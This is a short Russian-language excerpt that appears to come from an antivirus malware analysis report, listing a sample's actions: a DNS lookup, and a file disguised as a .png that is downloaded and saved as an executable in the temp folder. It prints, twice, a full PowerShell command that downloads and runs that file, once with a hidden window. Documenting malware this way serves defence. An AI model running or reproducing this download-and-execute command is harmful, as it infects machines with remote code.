Техническая информация
- http://www.sungkrorsang.com/dolsifcaplomcs.png как %temp%\sxbyt.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.sungkrorsang.com/dolsifcaplomcs.png','%TMP%\Sxbyt.exe');Start-Process '%TMP%\Sxbyt.exe';
- DNS ASK su####orsang.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.sungkrorsang.com/dolsifcaplomcs.png','%TMP%\Sxbyt.exe');Start-Process '%TMP%\Sxbyt.exe';' (со скрытым окном)